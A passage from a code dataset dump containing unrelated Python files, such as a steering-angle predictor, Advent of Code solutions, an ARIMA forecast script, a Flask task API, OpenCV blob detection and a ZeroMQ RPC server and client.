Remove the cache layer\n record.exc_text = None\n return output","repo_name":"CanavarB/CBOT","sub_path":"CLogger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"2222395969","text":"import cv2\nimport tensorflow as tf\nimport keras\nimport numpy as np\nfrom keras.models import load_model\nimport scipy.misc\n\n#print(tf.__version__)\n#print(keras.__version__)\n\n#provide model path here\nmodel_path = r'C:\\Projects\\Steering Angle Prediction\\model\\model_final_DV2.h5'\nmodel = load_model(model_path)\n\n#use to pre-process the each frame\ndef img_preprocess(image):\n height, _, _ = image.shape #this returns height,width,channel\n image = 
image[int(height/2):,:,:] # remove top half of the image, as it is not relevant for lane following\n    image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV)\n    image = cv2.GaussianBlur(image, (3,3), 0)\n    image = cv2.resize(image, (200,66)) # input image size (200,66) Nvidia model\n    image = image / 255 # normalizing, the processed image becomes black for some reason. do we need this?\n    return image\n\n# predicts the steering angle for each frame based on the trained model\ndef compute_steering_angle(frame):\n    preprocessed = img_preprocess(frame)\n    X = np.asarray([preprocessed])\n    steering_angle = model.predict(X)[0]\n    #print(X[0])\n    return steering_angle\n\n# load the steering wheel image\nimg = cv2.imread(r'C:\\Projects\\Steering Angle Prediction\\assets\\steering.png',0)\nrows,cols = img.shape\n#cv2.imshow('img1',img)\n#cv2.waitKey()\n\nsmoothed_angle = 0\ni = 0\nwhile(cv2.waitKey(10) != ord('q')):\n    # load the dataset images one by one\n    full_image = cv2.imread(r'C:\\Users\\alok\\Desktop\\dataset2\\driving_dataset\\\\' + str(i) + \".jpg\")\n    pred_angle = compute_steering_angle(full_image) * (180 / np.pi)\n    print(\"Predicted steering angle: \" + str(pred_angle) + \" degrees\")\n    cv2.imshow(\"frame\", cv2.cvtColor(full_image, cv2.COLOR_RGB2BGR))\n\n    if pred_angle != smoothed_angle:  # avoid division by zero when the angles already match\n        smoothed_angle += 0.2 * pow(abs((pred_angle - smoothed_angle)), 2.0 / 3.0) * (pred_angle - smoothed_angle) / abs(pred_angle - smoothed_angle)\n    smoothed_angle = int(smoothed_angle)\n    M = cv2.getRotationMatrix2D((cols/2,rows/2),-smoothed_angle,1)\n    dst = cv2.warpAffine(img,M,(cols,rows))\n    cv2.imshow(\"steering wheel\", dst)\n\n    i += 1\n\ncv2.destroyAllWindows()\n","repo_name":"alok073/Steering-angle-prediction","sub_path":"src/simulation/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"27850728062","text":"import pytest\n\nfrom problem import build_validator, calculate_ticket_error_rate, find_field_ordering, invalid_ticket_score,\\\n    parse_tickets, validate_ticket\n\nEXAMPLE_TICKETS = \"\"\"\\\nclass: 1-3 or 5-7\nrow: 6-11 or 33-44\nseat: 13-40 or 45-50\n\nyour ticket:\n7,1,14\n\nnearby tickets:\n7,3,47\n40,4,50\n55,2,20\n38,6,12\\\n\"\"\"\n\n\ndef test_day16_ticket_error_rate():\n    rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n    assert calculate_ticket_error_rate(rules, nearby_tickets) == 71\n\n\ndef test_day16_build_validator():\n    rule = '1-3 or 5-7'\n    validator = build_validator(rule)\n    assert validator(1)\n    assert validator(3)\n    assert not validator(4)\n    assert validator(5)\n    assert validator(6)\n    assert not validator(8)\n\n\n@pytest.mark.parametrize('ticket,expected_value', [\n    ([7, 3, 47], None),\n    ([40, 4, 50], 4),\n    ([55, 2, 20], 55),\n    ([38, 6, 12], 12),\n])\ndef test_day16_invalid_ticket_value(ticket, expected_value):\n    rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n    assert invalid_ticket_score(rules, ticket) == expected_value\n\n\ndef test_day16_validate_ticket():\n    rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n    assert validate_ticket(rules, ['row', 'class', 'seat'], nearby_tickets[0])\n\n\ndef test_day16_find_field_ordering():\n    rules, my_ticket, nearby_tickets = parse_tickets(EXAMPLE_TICKETS)\n    assert find_field_ordering(rules, nearby_tickets) == ['row', 'class', 
'seat']\n","repo_name":"stephenhelms/adventofcode2020","sub_path":"day16/test_day16.py","file_name":"test_day16.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24061561775","text":"# coding=utf-8\nimport random\n\nsecrect = random.randint(1,10)\nprint('secrect = %d' %secrect)\nprint('----------------小甲鱼C工作室----------------')\ntemp = input('不妨猜一下小甲鱼现在心里想的是哪个数字:')\nif temp.isdigit():\n guess = int(temp)\n times = 1\n if guess == secrect:\n print('我去,你是小甲鱼心里的蛔虫吗?!')\n print('哼,猜中了也没有奖励!')\n else:\n while guess != secrect and times !=3:\n times += 1\n temp = input('哎呀,猜错了,请重新输入吧:')\n if temp.isdigit():\n guess = int(temp)\n if guess == secrect:\n print('我去,你是小甲鱼心里的蛔虫吗?!')\n print('哼,猜中了也没有奖励!')\n elif guess > secrect:\n print('哥,大了大了~~')\n else:\n print('嘿,小了!小了!')\n else:\n print('输入类型不对!!!')\n print('游戏结束,不玩啦^_^')\nelse:\n print('输入类型不对,请输入数字!!!')\n","repo_name":"babyfeir/python-excise","sub_path":"xiaojiayu/python-004.py","file_name":"python-004.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"31065103269","text":"#!/usr/bin/python3\ndef search_replace(my_list, search, replace):\n \n # Create a new list with the same size as the initial list\n \n new_list = [None] * len(my_list)\n \n # Iterate over the initial list\n \n for i in range(len(my_list)):\n \n # Check if the current element is the one to replace\n \n if my_list[i] == search:\n \n # If it is, replace it with the new element\n \n new_list[i] = replace\n \n else:\n \n # If it is not, keep the original element\n \n new_list[i] = my_list[i]\n \n # Return the new list\n \n return new_list\n\n","repo_name":"NyarCal/alx-higher_level_programming","sub_path":"0x04-python-more_data_structures/1-search_replace.py","file_name":"1-search_replace.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"18559626902","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom statsmodels.graphics.tsaplots import plot_acf\r\nfrom statsmodels.graphics.tsaplots import plot_pacf\r\nfrom statsmodels.tsa.stattools import adfuller as ADF\r\nfilename='G:/python_work/arima_data.xls'\r\nforrecastnum=5\r\ndata=pd.read_excel(filename,index_col=u'日期')\r\nplt.rcParams['font.sans-serif'] = ['SimHei']\r\nplt.rcParams['axes.unicode_minus'] = False\r\ndata.plot()\r\nplt.title('Time Series')\r\nplt.show()\r\nplot_acf(data)\r\nplt.show()\r\nprint(u'原始序列的ADF检验结果为:',ADF(data[u'销量']))\r\nD_data=data.diff(periods=1).dropna()\r\nD_data.columns=[u'销量差分']\r\nD_data.plot()\r\nplt.show()\r\nplot_acf(D_data).show()\r\nplot_pacf(D_data).show()\r\nprint(u'1阶差分序列的ADF检验结果为:',ADF(D_data[u'销量差分']))\r\nfrom statsmodels.stats.diagnostic import acorr_ljungbox\r\nprint(u'差分序列的白噪声检验结果为:',acorr_ljungbox(D_data,lags=1))\r\nfrom statsmodels.tsa.arima_model import ARIMA\r\ndata[u'销量'] = data[u'销量'].astype(float)\r\npmax=int(len(D_data)/10)\r\nqmax=int(len(D_data)/10)\r\nbic_matrix=[]\r\nfor p in range(pmax+1):\r\n tmp=[]\r\n for q in range(qmax+1):\r\n try:\r\n tmp.append(ARIMA(data,(p,1,q)).fit().bic)\r\n except:\r\n tmp.append(None)\r\n 
bic_matrix.append(tmp)\r\nbic_matrix=pd.DataFrame(bic_matrix)\r\nprint(bic_matrix)\r\np,q=bic_matrix.stack().idxmin()\r\nprint(u'The p and q values with the minimum BIC are: %s, %s'%(p,q))\r\nmodel=ARIMA(data,(p,1,q)).fit()\r\nmodel.summary2()\r\nforecast=model.forecast(5)\r\nprint(forecast)\r\n\r\n\r\n\r\n\r\n","repo_name":"huang027/ARIMA","sub_path":"ARIMA.py","file_name":"ARIMA.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"57"} +{"seq_id":"42036755098","text":"import random\r\nimport numpy\r\nimport time\r\n\r\ndef sim(trial):\r\n    true = 0\r\n    for i in range(trial):\r\n        x = random.uniform(0, 1)\r\n        y = random.uniform(0, 1)\r\n        if x**2 + y**2 < 1:\r\n            true += 1\r\n\r\n    print(4*true / trial)\r\n\r\nstart = time.time()\r\ntrial = 1000000\r\nsim(trial)\r\nelapsed_time = time.time() - start\r\nprint(\"elapsed_time:{0}\".format(elapsed_time) + \"[sec]\")","repo_name":"Tomoro0726/Monte","sub_path":"monte3.py","file_name":"monte3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"70901440817","text":"#! /usr/bin/env python3\n\nimport sys\nimport os\nimport argparse\nimport json\nimport re\n\ndef main():\n    arg_parser = argparse.ArgumentParser(description = 'Simplify and fix scenarios in a JSON collection format')\n    arg_parser.add_argument(\"json_in_file\", type=str,\n        help=\"input .json file to be converted\")\n    arg_parser.add_argument(\"json_out_file\", type=str,\n        help=\"output .json file to save the scenarios to\")\n    arg_parser.add_argument(\"-p\", \"--remove-local-path\", action=\"store_true\",\n        help=\"Removes the local-path directive (it needs to be re-added in order to execute the scenarios) (default: disabled)\")\n\n    args = arg_parser.parse_args()\n    with open(args.json_in_file, \"r\") as in_fs:\n        scenario_list = json.load(in_fs)\n\n    rv = []\n    for i, scenario in enumerate(scenario_list):\n        scenario_str = scenario['body']\n        if args.remove_local_path:\n            scenario_str = re.sub(r'^[\\s\\S]*localPath[^\\n]*\\n', \"\", scenario_str, flags=re.MULTILINE)\n        scenario_str = re.sub(r'^\\s*#[^\\n]*$', \"\", scenario_str, flags=re.MULTILINE) # Remove whole-line comments\n        scenario_str = re.sub(r'^\\s*\\n', \"\", scenario_str, flags=re.MULTILINE) # Remove empty lines\n        scenario_str = re.sub(r'^(\\s*)model scenic.[\\S]*', r'\\1model scenic.simulators.carla.model', scenario_str, flags=re.MULTILINE) # Fix incorrect model name\n        scenario_str = re.sub(r'vehicle.lincoln.mkz2017', 'vehicle.lincoln.mkz_2017', scenario_str) # Fix broken vehicle name\n        scenario['body'] = scenario_str\n        rv.append(scenario)\n\n    with open(args.json_out_file, \"w\") as out_fs:\n        json.dump(rv, out_fs, indent=2)\n\nif __name__ == \"__main__\":\n    main()\n\n\n","repo_name":"Avmb/DialogLLMScenic","sub_path":"scenario_generation/simplify_scenarios_in_json_collection.py","file_name":"simplify_scenarios_in_json_collection.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"57"} +{"seq_id":"22009519486","text":"import logging\nimport os\n\nfrom flask import Blueprint, jsonify, request\n\nfrom .controllers import Task, TaskCollection, manager\nfrom .tasks import example_task, face_identify\n\ntasks = Blueprint(\"tasks\", __name__)\n\nlogger = logging.getLogger(__name__)\n\n\n@tasks.route(\"/start\", methods=[\"POST\", \"GET\"])\ndef start():\n    if request.method == \"POST\":\n        n = 
int(request.form[\"n\"])\n t = float(request.form[\"t\"])\n priority = int(request.form[\"priority\"])\n\n collection = TaskCollection()\n for _ in range(n):\n Task(collection, example_task, t, priority=priority)\n manager.add_task_collection(collection)\n\n return jsonify({\"Status\": \"Success\", \"task_collection_id\": collection.id})\n\n else:\n return \"\"\"\n \n \n \n \n \"\"\"\n\n\n@tasks.route(\"/face-rec\", methods=[\"POST\", \"GET\"])\ndef face_rec():\n if request.method == \"POST\":\n dirpath = request.form[\"dir\"]\n priority = int(request.form[\"priority\"])\n filepaths = [\n os.path.join(dirpath, filename) for filename in os.listdir(dirpath)\n ]\n\n collection = TaskCollection()\n\n for filepath in filepaths:\n Task(collection, face_identify, filepath, tolerace=0.5, priority=priority)\n\n manager.add_task_collection(collection)\n return jsonify({\"task_collection_id\": collection.id})\n\n else:\n return \"\"\"
\n            <form method=\"post\">\n                <input type=\"text\" name=\"dir\" placeholder=\"directory path\">\n                <input type=\"text\" name=\"priority\" placeholder=\"priority\">\n                <input type=\"submit\">\n            </form>\n        
\"\"\"\n\n\n@tasks.route(\"/status\")\ndef status():\n task_collection_id = request.args.get(\"id\")\n\n if task_collection_id is None:\n results = manager.status()\n return jsonify(results)\n else:\n status, progress = manager.status(task_collection_id)\n return jsonify(\n {\n \"task_collection_id\": task_collection_id,\n \"status\": status,\n \"progress\": progress,\n }\n )\n","repo_name":"griseduardo/Facial-Recognition-Database-Management-System","sub_path":"server/tasks/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"57"} +{"seq_id":"27835836351","text":"# tweet.py\n# Class for storing tweets.\n\nimport re\n\nRTPAT = re.compile('^RT @(\\w+):')\n\nclass Tweet(object):\n\tdef __init__(self, text=None, tweet_id=None, author=None, author_id=None, timestamp=None):\n\t\tself.text = text\n\t\tself.tweet_id = tweet_id\n\t\tself.author = author\n\t\tself.author_id = author_id\n\t\tself.timestamp = timestamp\n\n\t\tself.tokens = []\n\t\tself.poses = []\n\t\tself.phrases = []\n\t\tself.awards = []\n\n\tdef is_retweet(self):\n\t\treturn bool(RTPAT.match(self.text))\n\n\tdef retweet_user(self):\n\t\tm = RTPAT.match(self.text)\n\t\treturn m.group(1) if m else None\n","repo_name":"brandonfujii/golden_globes","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"33309219630","text":"\"\"\"\nLayers\n======\n\nLayers are the standard unit of neural models in DyNN. Layers are typically\nused like this:\n\n.. code-block:: python\n\n # Instantiate layer\n layer = Layer(parameter_collection, *args, **kwargs)\n # [...]\n # Renew computation graph\n dy.renew_cg()\n # Initialize layer\n layer.init(*args, **kwargs)\n # Apply layer forward pass\n y = layer(x)\n\"\"\"\nfrom .base_layers import BaseLayer, ParametrizedLayer\n\nfrom .functional_layers import Lambda\nfrom .dense_layers import Affine\nfrom .embedding_layers import Embeddings\nfrom .residual_layers import Residual\nfrom .recurrent_layers import (\n RecurrentCell, StackedRecurrentCells, ElmanRNN, LSTM, StackedLSTM\n)\nfrom .transduction_layers import Transduction, Unidirectional, Bidirectional\nfrom .pooling_layers import MaxPool1D, MaxPool2D, MeanPool1D\nfrom .attention_layers import (\n MLPAttention, BilinearAttention, MultiHeadAttention\n)\nfrom .convolution_layers import Conv1D, Conv2D\nfrom .flow_layers import Flatten\nfrom .normalization_layers import LayerNorm\nfrom .combination_layers import Sequential, Parallel\nfrom .transformer_layers import (\n Transformer, StackedTransformers, CondTransformer, StackedCondTransformers\n)\n\n\n__all__ = [\n \"BaseLayer\",\n \"ParametrizedLayer\",\n \"Lambda\",\n \"Affine\",\n \"Embeddings\",\n \"Residual\",\n \"RecurrentCell\",\n \"StackedRecurrentCells\",\n \"ElmanRNN\",\n \"LSTM\",\n \"StackedLSTM\",\n \"Transduction\",\n \"Unidirectional\",\n \"Bidirectional\",\n \"MaxPool1D\",\n \"MaxPool2D\",\n \"MeanPool1D\",\n \"MLPAttention\",\n \"BilinearAttention\",\n \"MultiHeadAttention\",\n \"Conv1D\",\n \"Conv2D\",\n \"Flatten\",\n \"LayerNorm\",\n \"Sequential\",\n \"Parallel\",\n \"Transformer\",\n \"StackedTransformers\",\n \"CondTransformer\",\n 
\"StackedCondTransformers\"\n]\n","repo_name":"pmichel31415/dynn","sub_path":"dynn/layers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"41444834052","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 13 18:30:04 2021\r\n\r\n@author: 14677\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom geometry_msgs.msg import Point\r\n\r\n# Params for camera calibration\r\ntheta = 0\r\nbeta = 1\r\ntx = 0\r\nty = 0\r\n\r\ndef IMG2W(x,y):\r\n #T = np.array([1,0,0,tx],[0,1,0,ty],[0,0,1,0],[0,0,0,1])\r\n yw=((x-394)/beta)*1000+ty\r\n xw=((y-256)/beta)*1000+tx\r\n return [xw,yw]\r\n\r\ndef blob_search(image_raw, color):\r\n # Setup SimpleBlobDetector parameters.\r\n params = cv2.SimpleBlobDetector_Params()\r\n # Filter by Color\r\n params.filterByColor = False\r\n # Filter by Area.\r\n params.filterByArea = True\r\n params.maxArea = 800\r\n params.minArea = 250\r\n # Filter by Circularity\r\n params.filterByCircularity = False\r\n params.maxCircularity = 0.82\r\n params.minCircularity = 0.7\r\n # Filter by Inerita\r\n params.filterByInertia = False\r\n params.maxInertiaRatio = 1\r\n params.minInertiaRatio = 0.8\r\n # Filter by Convexity\r\n params.filterByConvexity = False\r\n # Create a detector with the parameters\r\n detector = cv2.SimpleBlobDetector_create(params)\r\n # Convert the image into the HSV color space\r\n hsv_image = cv2.cvtColor(image_raw, cv2.COLOR_BGR2HSV)\r\n if (color=='yellow'):\r\n lower = (20,150,50) # yellow lower\r\n upper = (36,255,255) # yellow upper\r\n elif (color=='brown') :\r\n lower = (35,150,50) # brown lower\r\n upper = (74,255,255) # brown upper\r\n else :\r\n lower = (35,150,50) # green lower\r\n upper = (74,255,255) # green upper\r\n \r\n # Define a mask using the lower and upper bounds of the target color\r\n mask_image = cv2.inRange(hsv_image, lower, upper)\r\n keypoints = detector.detect(mask_image)\r\n # Find blob centers in the image coordinates\r\n blob_image_center = []\r\n #num_blobs = len(keypoints)\r\n num_blobs = len(keypoints)\r\n for i in range(num_blobs):\r\n blob_image_center.append((keypoints[i].pt[0],keypoints[i].pt[1]))\r\n # Draw the keypoints on the detected block\r\n im_with_keypoints = cv2.drawKeypoints(image_raw, keypoints, np.array([]),(0,0,255))\r\n xw_yw = []\r\n if(num_blobs == 0):\r\n pass\r\n print(\"No block found!\")\r\n else:\r\n # Convert image coordinates to global world coordinate using IM2W() function\r\n for i in range(num_blobs):\r\n xw_yw.append(IMG2W(blob_image_center[i][0], blob_image_center[i][1]))\r\n #cv2.namedWindow(\"Camera View\")\r\n #cv2.imshow(\"Camera View\", image_raw)\r\n #cv2.namedWindow(\"Mask View\")\r\n #cv2.imshow(\"Mask View\", mask_image)\r\n cv2.namedWindow(\"Keypoint View\")\r\n cv2.imshow(\"Keypoint View\", im_with_keypoints)\r\n cv2.waitKey(2)\r\n return xw_yw\r\n","repo_name":"ZheyuZhou/ECE-470-Project","sub_path":"blob_search.py","file_name":"blob_search.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"292391041","text":"#!/usr/bin/env python3\nfrom typing import List, Any, Callable\n\n\nclass FindSeat:\n f = open(\"data.txt\", \"r\")\n lines = f.read().splitlines()\n row = 0\n column = 0\n id = 0\n ids = []\n seatsTaken = []\n\n rows = range(128)\n columns = range(8)\n\n def findOwnSeat(self):\n for seatID in self.ids:\n if (seatID + 1 in 
self.ids) and (seatID - 1 in self.ids):\n self.seatsTaken.append(seatID)\n\n self.seatsTaken.sort()\n diff: Callable[[Any, Any], List[Any]] = lambda l1, l2: [x for x in l1 if x not in l2]\n emptySeats = diff(self.ids, self.seatsTaken)\n emptySeats.sort()\n\n emptySeats.remove(emptySeats[0])\n emptySeats = emptySeats[:len(emptySeats) - 1]\n yourSeatRange = range(emptySeats[0], emptySeats[1])\n print(\"Your Seat ID: \", yourSeatRange[1])\n\n def boarding(self):\n for line in self.lines:\n self.id, self.row, self.column = 0, 0, 0\n self.rows = range(128)\n self.columns = range(8)\n\n r_locs = line[0:7]\n c_locs = line[7:10]\n\n for r_loc in r_locs:\n self.rows = getPosition(r_loc, self.rows)\n if len(self.rows) == 1:\n for row in self.rows:\n self.row = int(row)\n\n for c_loc in c_locs:\n self.columns = getPosition(c_loc, self.columns)\n if len(self.columns) == 1:\n for column in self.columns:\n self.column = int(column)\n\n self.id = self.row * 8 + self.column\n self.ids.append(self.id)\n self.findOwnSeat()\n\n\ndef getPosition(char, range):\n if char in [\"F\", \"L\"]: # lower\n return range[:len(range) // 2]\n if char in [\"B\", \"R\"]: # upper\n return range[len(range) // 2:]\n\n\nFindSeat().boarding()\n","repo_name":"mrmoonlv/Advent-of-Code","sub_path":"2020/day5/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9302301123","text":"import os\nfrom os import truncate\nimport signal\nimport threading\nimport traceback\nfrom datetime import datetime, timedelta\nfrom functools import lru_cache\nfrom typing import Any, Callable, Dict\nfrom pathlib import Path\n\nimport zmq\nimport zmq.auth\nfrom zmq.backend.cython.constants import NOBLOCK\nfrom zmq.auth.thread import ThreadAuthenticator\n\n\n# Achieve Ctrl-c interrupt recv\nsignal.signal(signal.SIGINT, signal.SIG_DFL)\n\n\nKEEP_ALIVE_TOPIC: str = \"_keep_alive\"\nKEEP_ALIVE_INTERVAL: timedelta = timedelta(seconds=1)\nKEEP_ALIVE_TOLERANCE: timedelta = timedelta(seconds=30)\n\n\nclass RemoteException(Exception):\n \"\"\"\n RPC remote exception\n \"\"\"\n\n def __init__(self, value: Any):\n \"\"\"\n Constructor\n \"\"\"\n self.__value = value\n\n def __str__(self):\n \"\"\"\n Output error message\n \"\"\"\n return self.__value\n\n\nclass RpcServer:\n \"\"\"\"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n # Save functions dict: key is fuction name, value is fuction object\n self.__functions: Dict[str, Any] = {}\n\n # Zmq port related\n self.__context: zmq.Context = zmq.Context()\n\n # Reply socket (Request–reply pattern)\n self.__socket_rep: zmq.Socket = self.__context.socket(zmq.REP)\n\n # Publish socket (Publish–subscribe pattern)\n self.__socket_pub: zmq.Socket = self.__context.socket(zmq.PUB)\n\n # Worker thread related\n self.__active: bool = False # RpcServer status\n self.__thread: threading.Thread = None # RpcServer thread\n self.__lock: threading.Lock = threading.Lock()\n\n # Authenticator used to ensure data security\n self.__authenticator: ThreadAuthenticator = None\n\n def is_active(self) -> bool:\n \"\"\"\"\"\"\n return self.__active\n\n def start(\n self, \n rep_address: str, \n pub_address: str,\n server_secretkey_path: str = \"\",\n username: str = \"\",\n password: str = \"\"\n ) -> None:\n \"\"\"\n Start RpcServer\n \"\"\"\n if self.__active:\n return\n\n # Start authenticator\n if server_secretkey_path:\n self.__authenticator = ThreadAuthenticator(self.__context)\n 
self.__authenticator.start()\n self.__authenticator.configure_curve(\n domain=\"*\", \n location=zmq.auth.CURVE_ALLOW_ANY\n )\n\n publickey, secretkey = zmq.auth.load_certificate(server_secretkey_path)\n \n self.__socket_pub.curve_secretkey = secretkey\n self.__socket_pub.curve_publickey = publickey\n self.__socket_pub.curve_server = True\n\n self.__socket_rep.curve_secretkey = secretkey\n self.__socket_rep.curve_publickey = publickey\n self.__socket_rep.curve_server = True\n elif username and password:\n self.__authenticator = ThreadAuthenticator(self.__context)\n self.__authenticator.start()\n self.__authenticator.configure_plain(\n domain=\"*\", \n passwords={username: password}\n )\n\n self.__socket_pub.plain_server = True\n self.__socket_rep.plain_server = True\n\n # Bind socket address\n self.__socket_rep.bind(rep_address)\n self.__socket_pub.bind(pub_address)\n\n # Start RpcServer status\n self.__active = True\n\n # Start RpcServer thread\n self.__thread = threading.Thread(target=self.run)\n self.__thread.start()\n\n def stop(self) -> None:\n \"\"\"\n Stop RpcServer\n \"\"\"\n if not self.__active:\n return\n\n # Stop RpcServer status\n self.__active = False\n\n def join(self) -> None:\n # Wait for RpcServer thread to exit\n if self.__thread and self.__thread.is_alive():\n self.__thread.join()\n self.__thread = None\n\n def run(self) -> None:\n \"\"\"\n Run RpcServer functions\n \"\"\"\n start = datetime.utcnow()\n\n while self.__active:\n # Use poll to wait event arrival, waiting time is 1 second (1000 milliseconds)\n cur = datetime.utcnow()\n delta = cur - start\n\n if delta >= KEEP_ALIVE_INTERVAL:\n self.publish(KEEP_ALIVE_TOPIC, cur)\n\n if not self.__socket_rep.poll(1000):\n continue\n\n # Receive request data from Reply socket\n req = self.__socket_rep.recv_pyobj()\n\n # Get function name and parameters\n name, args, kwargs = req\n\n # Try to get and execute callable function object; capture exception information if it fails\n try:\n func = self.__functions[name]\n r = func(*args, **kwargs)\n rep = [True, r]\n except Exception as e: # noqa\n rep = [False, traceback.format_exc()]\n\n # send callable response by Reply socket\n self.__socket_rep.send_pyobj(rep)\n\n # Unbind socket address\n self.__socket_pub.unbind(self.__socket_pub.LAST_ENDPOINT)\n self.__socket_rep.unbind(self.__socket_rep.LAST_ENDPOINT)\n\n def publish(self, topic: str, data: Any) -> None:\n \"\"\"\n Publish data\n \"\"\"\n with self.__lock:\n self.__socket_pub.send_pyobj([topic, data])\n\n def register(self, func: Callable) -> None:\n \"\"\"\n Register function\n \"\"\"\n self.__functions[func.__name__] = func\n\n\nclass RpcClient:\n \"\"\"\"\"\"\n\n def __init__(self):\n \"\"\"Constructor\"\"\"\n # zmq port related\n self.__context: zmq.Context = zmq.Context()\n\n # Request socket (Request–reply pattern)\n self.__socket_req: zmq.Socket = self.__context.socket(zmq.REQ)\n\n # Subscribe socket (Publish–subscribe pattern)\n self.__socket_sub: zmq.Socket = self.__context.socket(zmq.SUB)\n\n # Worker thread relate, used to process data pushed from server\n self.__active: bool = False # RpcClient status\n self.__thread: threading.Thread = None # RpcClient thread\n self.__lock: threading.Lock = threading.Lock()\n\n # Authenticator used to ensure data security\n self.__authenticator: ThreadAuthenticator = None\n\n self._last_received_ping: datetime = datetime.utcnow()\n\n @lru_cache(100)\n def __getattr__(self, name: str):\n \"\"\"\n Realize remote call function\n \"\"\"\n\n # Perform remote call task\n def 
dorpc(*args, **kwargs):\n # Get timeout value from kwargs, default value is 30 seconds\n if \"timeout\" in kwargs:\n timeout = kwargs.pop(\"timeout\")\n else:\n timeout = 30000\n\n # Generate request\n req = [name, args, kwargs]\n\n # Send request and wait for response\n with self.__lock:\n self.__socket_req.send_pyobj(req)\n \n # Timeout reached without any data\n n = self.__socket_req.poll(timeout)\n if not n:\n msg = f\"Timeout of {timeout}ms reached for {req}\"\n raise RemoteException(msg)\n \n rep = self.__socket_req.recv_pyobj()\n\n # Return response if successed; Trigger exception if failed\n if rep[0]:\n return rep[1]\n else:\n raise RemoteException(rep[1])\n\n return dorpc\n\n def start(\n self, \n req_address: str, \n sub_address: str,\n client_secretkey_path: str = \"\",\n server_publickey_path: str = \"\",\n username: str = \"\",\n password: str = \"\"\n ) -> None:\n \"\"\"\n Start RpcClient\n \"\"\"\n if self.__active:\n return\n\n # Start authenticator\n if client_secretkey_path and server_publickey_path:\n self.__authenticator = ThreadAuthenticator(self.__context)\n self.__authenticator.start()\n self.__authenticator.configure_curve(\n domain=\"*\", \n location=zmq.auth.CURVE_ALLOW_ANY\n )\n\n publickey, secretkey = zmq.auth.load_certificate(client_secretkey_path)\n serverkey, _ = zmq.auth.load_certificate(server_publickey_path)\n \n self.__socket_sub.curve_secretkey = secretkey\n self.__socket_sub.curve_publickey = publickey\n self.__socket_sub.curve_serverkey = serverkey\n\n self.__socket_req.curve_secretkey = secretkey\n self.__socket_req.curve_publickey = publickey\n self.__socket_req.curve_serverkey = serverkey\n elif username and password:\n self.__authenticator = ThreadAuthenticator(self.__context)\n self.__authenticator.start()\n self.__authenticator.configure_plain(\n domain=\"*\", \n passwords={username: password}\n )\n\n self.__socket_sub.plain_username = username.encode()\n self.__socket_sub.plain_password = password.encode()\n \n self.__socket_req.plain_username = username.encode()\n self.__socket_req.plain_password = password.encode()\n \n # Connect zmq port\n self.__socket_req.connect(req_address)\n self.__socket_sub.connect(sub_address)\n\n # Start RpcClient status\n self.__active = True\n\n # Start RpcClient thread\n self.__thread = threading.Thread(target=self.run)\n self.__thread.start()\n\n self._last_received_ping = datetime.utcnow()\n\n def stop(self) -> None:\n \"\"\"\n Stop RpcClient\n \"\"\"\n if not self.__active:\n return\n\n # Stop RpcClient status\n self.__active = False\n\n def join(self) -> None:\n # Wait for RpcClient thread to exit\n if self.__thread and self.__thread.is_alive():\n self.__thread.join()\n self.__thread = None\n\n def run(self) -> None:\n \"\"\"\n Run RpcClient function\n \"\"\"\n pull_tolerance = int(KEEP_ALIVE_TOLERANCE.total_seconds() * 1000)\n\n while self.__active:\n if not self.__socket_sub.poll(pull_tolerance):\n self.on_disconnected()\n continue\n\n # Receive data from subscribe socket\n topic, data = self.__socket_sub.recv_pyobj(flags=NOBLOCK)\n\n if topic == KEEP_ALIVE_TOPIC:\n self._last_received_ping = data\n else:\n # Process data by callable function\n self.callback(topic, data)\n\n # Close socket\n self.__socket_req.close()\n self.__socket_sub.close()\n\n def callback(self, topic: str, data: Any) -> None:\n \"\"\"\n Callable function\n \"\"\"\n raise NotImplementedError\n\n def subscribe_topic(self, topic: str) -> None:\n \"\"\"\n Subscribe data\n \"\"\"\n self.__socket_sub.setsockopt_string(zmq.SUBSCRIBE, 
